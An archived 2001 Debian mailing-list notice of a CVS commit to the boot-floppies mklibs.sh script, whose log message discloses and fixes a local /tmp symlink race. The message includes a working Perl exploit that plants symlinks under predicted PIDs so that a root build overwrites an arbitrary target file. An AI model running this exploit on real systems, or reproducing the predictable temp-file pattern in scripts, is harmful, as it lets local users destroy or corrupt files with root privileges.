Debian Boot CVS: joeyh

To: debian-boot@lists.debian.org
Subject: Debian Boot CVS: joeyh
From: Debian Boot CVS Master <aph@debian.org>
Date: Thu, 11 Jan 2001 12:32:45 -0800
Message-id: <E14GoOr-0000a6-00@klecker.debian.org>
Mail-followup-to: debian-boot@lists.debian.org
Reply-to: Debian Boot List <debian-boot@lists.debian.org>

CVSROOT:	/cvs/debian-boot
Module name:	boot-floppies
Changes by:	joeyh	01/01/11 12:32:45

Modified files:
	scripts/rootdisk: mklibs.sh 

Log message:
Sigh. Fixed a local symlink attack that allowed any user on the system to
overwrite any file on the system with a list of the symbols in libc when
the boot-floppies were building (which typically runs as root..). Working
exploit:

#!/usr/bin/perl
$target=shift;
system `rm -rf /tmp/nasty`;
mkdir '/tmp/nasty', 0755;
chdir '/tmp/nasty';
symlink($target,'undefined-symbols');
chdir '..';
$|=1;
# FIXME: pid wraparound. Plus this could be smarter.
for ($x=$$ + 1; $x < $$ + 100000; $x++) {
symlink("nasty", ",mklibs.$x");
print ".";
}

set -e should *not* be optional in shell scripts!

Reply to:

Prev by Date: library deduction again
Next by Date: Debian Boot CVS: joeyh
Previous by thread: Debian Boot CVS: joeyh
Next by thread: Debian Boot CVS: joeyh
Index(es):
- Date
- Thread